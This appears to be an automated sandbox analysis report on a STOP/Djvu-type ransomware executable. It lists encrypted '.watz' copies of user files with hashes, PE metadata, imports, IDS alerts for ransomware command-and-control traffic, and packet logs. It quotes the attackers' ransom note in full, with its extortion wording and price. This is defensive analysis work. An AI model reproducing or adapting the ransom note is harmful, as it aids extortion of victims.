Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.494041457799019
Encrypted:	false
SSDEEP:	6:J9980oxqGzl5b4XAkbb4CXu69Q6XWwlkgODmnU7veknH7sKo3B4VYfWyc3cii96Z:V8Fq+bk34C+kQ6GEkgODZnHGD1+cii9a
MD5:	C383BDC83EED72CA2CFFE6E1CA149469
SHA1:	1C5B2D48AFE0CAFA676AB02510E80F64469B02CF
SHA-256:	5DA7BFC0996137EB08742369D31FB30645D336349FA8D0CACDA023F5350700E8
SHA-512:	344DD9AC0B76BC5FD1B830CCF3F4A730A0779AA6D9695A05EFAE596166DE044FB781A282A508022BBA5EB898B78E666ACC37AA86C9E08347689FD202F271FC7B
Malicious:	false
Preview:	[{000.k.....[?......OWB^.b..,.z..F...Uz..FB..)...).8@#K...W.8}9.x.t;.Z...I..Eg.rR.N..7..._`{..:p.......'a..;.............,.R1.k1.<e^.........\.EX...L<.. .t..sn..-....$... ....:,\|..8.[2...4...[....u1.:)..^..:..D....s..8..xLv...7.7.]....L..e.I..'B.>.s.N................~..ox...W..H.P...uC....%.1.O#..[Y......;.Q.5.k^.... 4N.a....z....g+..e.....m.7\.9..QSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.494041457799019
Encrypted:	false
SSDEEP:	6:J9980oxqGzl5b4XAkbb4CXu69Q6XWwlkgODmnU7veknH7sKo3B4VYfWyc3cii96Z:V8Fq+bk34C+kQ6GEkgODZnHGD1+cii9a
MD5:	C383BDC83EED72CA2CFFE6E1CA149469
SHA1:	1C5B2D48AFE0CAFA676AB02510E80F64469B02CF
SHA-256:	5DA7BFC0996137EB08742369D31FB30645D336349FA8D0CACDA023F5350700E8
SHA-512:	344DD9AC0B76BC5FD1B830CCF3F4A730A0779AA6D9695A05EFAE596166DE044FB781A282A508022BBA5EB898B78E666ACC37AA86C9E08347689FD202F271FC7B
Malicious:	false
Preview:	[{000.k.....[?......OWB^.b..,.z..F...Uz..FB..)...).8@#K...W.8}9.x.t;.Z...I..Eg.rR.N..7..._`{..:p.......'a..;.............,.R1.k1.<e^.........\.EX...L<.. .t..sn..-....$... ....:,\|..8.[2...4...[....u1.:)..^..:..D....s..8..xLv...7.7.]....L..e.I..'B.>.s.N................~..ox...W..H.P...uC....%.1.O#..[Y......;.Q.5.k^.... 4N.a....z....g+..e.....m.7\.9..QSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.3956309764104535
Encrypted:	false
SSDEEP:	12:oh9poElAzdYGszOhXsFFE2daOxuQ+AkT1+cii9a:iAdZSOhcU28gV+BgbD
MD5:	D460ABA05CF6F76EA0F6B2A735262CF4
SHA1:	5591E1F990541F5181C5EB31E8F00A1B3888B03D
SHA-256:	3850A5B7BBCEB8FF639C9EBE741FB81BBDAD34F63C501DD31CED6ADDA10047DD
SHA-512:	2F742AA2A6950A69D4F564513E58EFFE18566713FA4DDE2DA96AA1D9C2D8F826C6223DC50E8106AD89EC118D28756A940AE76C20B2085C47689D24D2B6AD33B0
Malicious:	false
Preview:	[{000.D)o..js.....}z.@\.........A.9A..4..td..D..^#Lt>PFu..S....L.w.}Fr.._...........{.%f....o I...@..-C.2..=.]..sAmi.JV...cN.D.k_e...!;@..L.`i.X..%l.Zh........L...a..e..#w.. ...x.u.."u....07.'#...6....`.Zfav.Z)..pt........S..qhA...YI6N.O...\|1..ja..{...W.....W_..S..dfo[..+...5Y}tP+..LW.m8 .7..~.L.8.E..../.^.\~.....[R.Fr....!.....R....G.8..}m..@ 2+...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.3956309764104535
Encrypted:	false
SSDEEP:	12:oh9poElAzdYGszOhXsFFE2daOxuQ+AkT1+cii9a:iAdZSOhcU28gV+BgbD
MD5:	D460ABA05CF6F76EA0F6B2A735262CF4
SHA1:	5591E1F990541F5181C5EB31E8F00A1B3888B03D
SHA-256:	3850A5B7BBCEB8FF639C9EBE741FB81BBDAD34F63C501DD31CED6ADDA10047DD
SHA-512:	2F742AA2A6950A69D4F564513E58EFFE18566713FA4DDE2DA96AA1D9C2D8F826C6223DC50E8106AD89EC118D28756A940AE76C20B2085C47689D24D2B6AD33B0
Malicious:	false
Preview:	[{000.D)o..js.....}z.@\.........A.9A..4..td..D..^#Lt>PFu..S....L.w.}Fr.._...........{.%f....o I...@..-C.2..=.]..sAmi.JV...cN.D.k_e...!;@..L.`i.X..%l.Zh........L...a..e..#w.. ...x.u.."u....07.'#...6....`.Zfav.Z)..pt........S..qhA...YI6N.O...\|1..ja..{...W.....W_..S..dfo[..+...5Y}tP+..LW.m8 .7..~.L.8.E..../.^.\~.....[R.Fr....!.....R....G.8..}m..@ 2+...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.487312220342211
Encrypted:	false
SSDEEP:	12:WOHk2+TLgqJaiB3dEmbDIETC84YxVEvio1+cii9a:Rk2Z4zbDMY76iDbD
MD5:	807744DBE681C7CEB9E6B09AB054E46B
SHA1:	69A5C9554BEE78CCE6A46E910E96A364A0B733D4
SHA-256:	CB9077A28B2426127DF32903A2B6C3C4C9E5B6F935490A215879CB28ED310263
SHA-512:	2CE773023089FE1C0DE7F8F6B91B910E912853CB3EE2C15F7BC5B7B3187B448027BF807AA9CBDC7F8C813EE4530286BD10CB57E48FF072D71578C6E0F5DDAC34
Malicious:	false
Preview:	[{000#DM.9..7.gR.2.m<...9..z.o.%W..\|1...xI$....j."...b.z....9..v.....a.{......`.Vk..._mrdv?..?.z...h...tk...p..Qd..S.1..>...~.}>y\|.5.o.=0.......%.U%..H...:.EKi~8).0.....)/..(.f.l....*.wes...I.@.r..5U......V...........U.....T..k(......C....[7..J...9M.Wm<9....Ocz-.....ly............W.u......b.CL..5]i.nF}gU.{.W.\.}..JRDg...=.N....b..}].....$.YUT.. ...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.487312220342211
Encrypted:	false
SSDEEP:	12:WOHk2+TLgqJaiB3dEmbDIETC84YxVEvio1+cii9a:Rk2Z4zbDMY76iDbD
MD5:	807744DBE681C7CEB9E6B09AB054E46B
SHA1:	69A5C9554BEE78CCE6A46E910E96A364A0B733D4
SHA-256:	CB9077A28B2426127DF32903A2B6C3C4C9E5B6F935490A215879CB28ED310263
SHA-512:	2CE773023089FE1C0DE7F8F6B91B910E912853CB3EE2C15F7BC5B7B3187B448027BF807AA9CBDC7F8C813EE4530286BD10CB57E48FF072D71578C6E0F5DDAC34
Malicious:	false
Preview:	[{000#DM.9..7.gR.2.m<...9..z.o.%W..\|1...xI$....j."...b.z....9..v.....a.{......`.Vk..._mrdv?..?.z...h...tk...p..Qd..S.1..>...~.}>y\|.5.o.=0.......%.U%..H...:.EKi~8).0.....)/..(.f.l....*.wes...I.@.r..5U......V...........U.....T..k(......C....[7..J...9M.Wm<9....Ocz-.....ly............W.u......b.CL..5]i.nF}gU.{.W.\.}..JRDg...=.N....b..}].....$.YUT.. ...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.470447266890839
Encrypted:	false
SSDEEP:	12:DYshtiMI75IQUJM9ciTFNXd8sWM6LkObf1+cii9a:DuMI75IB0ckRd8sW53bsbD
MD5:	2241850DD8BDA4B6DA5AA4F89C23F397
SHA1:	85C0859B27D24737A6285FF61D3EB5BD9F0D875C
SHA-256:	62AABC36CEA01B4A05C2341D7DB702FBB6C7447D7228A18C7F685325B8329D1F
SHA-512:	ADF949DB17B4F9807077317608A35F74DFE3966639616D59B2352D5A50F53DDA507AF05286C62FE947769984BC55F3AC71DCF4365E61E26CCD14387764B71580
Malicious:	false
Preview:	[{000..a.........X..Nc...t{..t.MW....` ..........E..>.H."."Q.az...\....~...&^I.....4t]..).a6.......A...........A.Y.SX=.c}.Je..q...}.......l...L!.&y.1...Z..W-.....K.U.&c..B.. ^.LN,d.A...@.5.#.......eM23..n........#B).4.Y.........._...E4..t.....:......Y.....(..Q.....+....Q.f.K...6..R.10_....)73$..T.q*q^..^..:..k(x.?..6$.X....La..ox..().....BSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.470447266890839
Encrypted:	false
SSDEEP:	12:DYshtiMI75IQUJM9ciTFNXd8sWM6LkObf1+cii9a:DuMI75IB0ckRd8sW53bsbD
MD5:	2241850DD8BDA4B6DA5AA4F89C23F397
SHA1:	85C0859B27D24737A6285FF61D3EB5BD9F0D875C
SHA-256:	62AABC36CEA01B4A05C2341D7DB702FBB6C7447D7228A18C7F685325B8329D1F
SHA-512:	ADF949DB17B4F9807077317608A35F74DFE3966639616D59B2352D5A50F53DDA507AF05286C62FE947769984BC55F3AC71DCF4365E61E26CCD14387764B71580
Malicious:	false
Preview:	[{000..a.........X..Nc...t{..t.MW....` ..........E..>.H."."Q.az...\....~...&^I.....4t]..).a6.......A...........A.Y.SX=.c}.Je..q...}.......l...L!.&y.1...Z..W-.....K.U.&c..B.. ^.LN,d.A...@.5.#.......eM23..n........#B).4.Y.........._...E4..t.....:......Y.....(..Q.....+....Q.f.K...6..R.10_....)73$..T.q*q^..^..:..k(x.?..6$.X....La..ox..().....BSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	7.828860665236357
Encrypted:	false
SSDEEP:	24:IUlhjXmejnHuv0C4t5PNfxguYV+NVQ0+QxLHaw47/noIbaZpfQDSxbD:IUH2gvP5x5AMtja5JEtQsD
MD5:	7A65C81E7BA9221E9696FAB5D2FBB141
SHA1:	760BA578343D54C8A1D7204B55B96B004D63F34E
SHA-256:	A80B801AADFFC2B34F94800B573A98EDD660C583F3B82611D3A8578F421F7C67
SHA-512:	C0A2B90C5231D77E43E39B51B5BFD2FE3389A0ED89148B24315645C35907DC7022C7B1D276EC85EB6880D83FB4B7E40D2FA95530A5F3CFF9A72C9E9AEA445FB5
Malicious:	false
Preview:	<?xml...>.n.Gj..V.~..:}../.n...p.h..=.,rV.t.C.a..j..=...N...........$.\.?.S.p...cU.9.n.g.yB_.R@..............,bj.~....p@..C.{....A6.oUO#V]..-]q..S^.........=..1p.w].....f..3+.D.W..y...G.U.K xp..g.Ua...}.?....'UtgK<.2..y..6.4=.....k......"u.C....:B..'....sW...v.7....8*o ..`.}e..........N.......r-....M4..k:.}?9D......_9...4.\....6.b...4.x.-......5($.f.=...`d..x..S$....m.Z.(.7n...I.v..C..Tb...0..B.F.J.......~..f.v.mW...qIekj&.3...}M. yP>...........a.....e[]B..N.v.].y...]......Z..w.A..9.-.%v..((...'{%W.\A......X...FT....K...#.M.?.>..<.....}.>...<...bj.DZ..d..{xMZ.7Q..........i....L..\....>Z.Q.x...s.4...T..YE..r4..1....5RZ.>.M.3...jt..... .#,...iBGhF...`.........b....0.Q5.0.:.Ab....Fq....p..!<..P..a.0....y.....87#...#....c+..'...}..<.[.}...P3.ph...C{..T....U.>2\|..U..-".>&......5..J......=.Z...W})m....Jq.hR.............5...K.U..Y..VG...,..!.v3...$Ew#e.P.y...2..'...Y.%.<.....6.a.Z.P..+..w.t..\|4..,..s...g.....}.B+f......"......J.!

C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	7.828860665236357
Encrypted:	false
SSDEEP:	24:IUlhjXmejnHuv0C4t5PNfxguYV+NVQ0+QxLHaw47/noIbaZpfQDSxbD:IUH2gvP5x5AMtja5JEtQsD
MD5:	7A65C81E7BA9221E9696FAB5D2FBB141
SHA1:	760BA578343D54C8A1D7204B55B96B004D63F34E
SHA-256:	A80B801AADFFC2B34F94800B573A98EDD660C583F3B82611D3A8578F421F7C67
SHA-512:	C0A2B90C5231D77E43E39B51B5BFD2FE3389A0ED89148B24315645C35907DC7022C7B1D276EC85EB6880D83FB4B7E40D2FA95530A5F3CFF9A72C9E9AEA445FB5
Malicious:	false
Preview:	<?xml...>.n.Gj..V.~..:}../.n...p.h..=.,rV.t.C.a..j..=...N...........$.\.?.S.p...cU.9.n.g.yB_.R@..............,bj.~....p@..C.{....A6.oUO#V]..-]q..S^.........=..1p.w].....f..3+.D.W..y...G.U.K xp..g.Ua...}.?....'UtgK<.2..y..6.4=.....k......"u.C....:B..'....sW...v.7....8*o ..`.}e..........N.......r-....M4..k:.}?9D......_9...4.\....6.b...4.x.-......5($.f.=...`d..x..S$....m.Z.(.7n...I.v..C..Tb...0..B.F.J.......~..f.v.mW...qIekj&.3...}M. yP>...........a.....e[]B..N.v.].y...]......Z..w.A..9.-.%v..((...'{%W.\A......X...FT....K...#.M.?.>..<.....}.>...<...bj.DZ..d..{xMZ.7Q..........i....L..\....>Z.Q.x...s.4...T..YE..r4..1....5RZ.>.M.3...jt..... .#,...iBGhF...`.........b....0.Q5.0.:.Ab....Fq....p..!<..P..a.0....y.....87#...#....c+..'...}..<.[.}...P3.ph...C{..T....U.>2\|..U..-".>&......5..J......=.Z...W})m....Jq.hR.............5...K.U..Y..VG...,..!.v3...$Ew#e.P.y...2..'...Y.%.<.....6.a.Z.P..+..w.t..\|4..,..s...g.....}.B+f......"......J.!

C:\Users\user\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.902166147224844
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3RR:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/kA
MD5:	7B001D9C73C3B729FE5420A889EC8BF7
SHA1:	F92AEE8C47A74B4D10D46C32676BDB7144275D82
SHA-256:	438A09FCDE4472A99996E58B713D2783048B5E6B6E490724652322A00102D657
SHA-512:	3C178717F9775D9C530EE7448CDFB432A0EE930F8A1A650921606CAA01A02B63C7411E9A9C3633CC3A108EEB6E68FD16CA81109A990F4113A0ED74BDAFB46803
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.574840010352023
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	746'496 bytes
MD5:	d7528cd33b73718b5949277420681f90
SHA1:	61d97f8da20ff2995890ce5f2c8a2c9e6e51c078
SHA256:	3b8d07693e296aee36e7607c71503d981396a21b367e169146afdd052cdcf4d1
SHA512:	b3dab709e19a2a8bad92b259ea1739ad55564f6fe31e9f4e502b6280ae6c70cdf5a0f1fda208887da4bbcf9213986e2038abe6a09dc2940998df08d82e87d474
SSDEEP:	12288:koywWrwlTyC9yR+xBP4wMpAuhjH8/Hl19KKjNgzqE0CM6EpJMwk:PlTX9Xj4w+hbM1/g2kM
TLSH:	A2F412557940E0B1CC4F87B69A16E5B0A61CBC6287B2F96F7284F7BF28332E05D1A345
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%K..vK..vK..v..^vJ..vU.LvU..vU.]v[..vU.Kv/..vlz.vN..vK..v>..vU.BvJ..vU.\vJ..vU.YvJ..vRichK..v........PE..L.....Ie...........

File Icon


Icon Hash:	738733b18bab83cc

Static PE Info

General

Entrypoint:	0x401475
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6549D9A6 [Tue Nov 7 06:31:02 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	0e02f2783b58059fb828111a17212082

Entrypoint Preview

Instruction
call 00007FECA95F13A4h
jmp 00007FECA95ED64Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [004AC8D8h], eax
mov dword ptr [004AC8D4h], ecx
mov dword ptr [004AC8D0h], edx
mov dword ptr [004AC8CCh], ebx
mov dword ptr [004AC8C8h], esi
mov dword ptr [004AC8C4h], edi
mov word ptr [004AC8F0h], ss
mov word ptr [004AC8E4h], cs
mov word ptr [004AC8C0h], ds
mov word ptr [004AC8BCh], es
mov word ptr [004AC8B8h], fs
mov word ptr [004AC8B4h], gs
pushfd
pop dword ptr [004AC8E8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004AC8DCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004AC8E0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004AC8ECh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004AC828h], 00010001h
mov eax, dword ptr [004AC8E0h]
mov dword ptr [004AC7DCh], eax
mov dword ptr [004AC7D0h], C0000409h
mov dword ptr [004AC7D4h], 00000001h
mov eax, dword ptr [004AB004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [004AB008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000B4h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa991c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbe000	0xb0a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa94b8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa8000	0x194	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa6b37	0xa6c00	4be504f4a528cf670403d174d83630ce	False	0.9053290737443778	data	7.733615032334482	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xa8000	0x2234	0x2400	548565afdcfca82f91934a2341f7bd5a	False	0.3566623263888889	data	5.4369802931580145	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xab000	0x12328	0x1e00	812c672fafa18b32b81296ba3acaaeff	False	0.1203125	data	1.3838866725388304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xbe000	0xb0a0	0xb200	27174a922d127ad57392159149cb07be	False	0.299267029494382	data	4.133741161684387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xc3be0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_CURSOR	0xc3d28	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0xc3e58	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0xc6428	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0xc6558	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0xbe460	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3611407249466951
RT_ICON	0xbf308	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5699458483754513
RT_ICON	0xbfbb0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6192396313364056
RT_ICON	0xc0278	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6625722543352601
RT_ICON	0xc07e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.4303941908713693
RT_ICON	0xc2d88	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5385245901639344
RT_ICON	0xc3710	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.5177304964539007
RT_STRING	0xc8d08	0x14e	data			0.5059880239520959
RT_STRING	0xc8e58	0x1b8	data			0.525
RT_STRING	0xc9010	0x90	data			0.6388888888888888
RT_GROUP_CURSOR	0xc3d10	0x14	data			1.15
RT_GROUP_CURSOR	0xc6400	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0xc8b00	0x22	data			1.088235294117647
RT_GROUP_ICON	0xc3b78	0x68	data	Turkish	Turkey	0.7115384615384616
RT_VERSION	0xc8b28	0x1dc	data			0.5756302521008403

Imports

DLL

Import

KERNEL32.dll

GetFullPathNameA, UnregisterWait, GlobalDeleteAtom, TryEnterCriticalSection, DebugActiveProcessStop, GetLogicalDriveStringsW, GetComputerNameW, GetModuleHandleW, GetTickCount, GetCommandLineA, GetSystemTimes, Sleep, FormatMessageW, DeleteVolumeMountPointW, HeapCreate, WriteConsoleW, GetAtomNameW, GetTimeZoneInformation, VirtualUnlock, GetShortPathNameA, InterlockedExchange, GetProcAddress, GetNumaHighestNodeNumber, LoadLibraryA, OpenWaitableTimerW, LocalAlloc, OpenJobObjectW, SetCommMask, FoldStringW, GetDefaultCommConfigA, EnumDateFormatsA, CreateWaitableTimerW, lstrcatW, FreeEnvironmentStringsW, SetCalendarInfoA, SetFileShortNameA, DebugBreak, CloseHandle, GetLastError, HeapFree, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, ReadFile, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, HeapSize, CreateFileA

USER32.dll

CopyRect, SetActiveWindow

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-09T10:48:45.328301+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49740	443	192.168.2.4	188.114.97.3
2024-08-09T10:48:49.611466+0200	TCP	2036335	ET MALWARE Win32/Filecoder.STOP Variant Public Key Download	1	80	64820	58.151.148.90	192.168.2.4
2024-08-09T10:48:09.976742+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49730	443	192.168.2.4	188.114.97.3
2024-08-09T10:48:49.611254+0200	TCP	2833438	ETPRO MALWARE STOP Ransomware CnC Activity	1	64820	80	192.168.2.4	58.151.148.90
2024-08-09T10:48:22.865818+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49736	443	192.168.2.4	188.114.97.3
2024-08-09T10:48:40.324827+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49739	443	192.168.2.4	188.114.97.3
2024-08-09T10:48:32.952529+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49738	443	192.168.2.4	188.114.97.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2024 10:48:09.047585964 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.047621965 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.047717094 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.067785025 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.067802906 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.565752029 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.565973043 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.611787081 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.611809969 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.612227917 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.612509966 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.615379095 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.660506964 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.976803064 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.976876974 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.976897001 CEST	443	49730	188.114.97.3	192.168.2.4
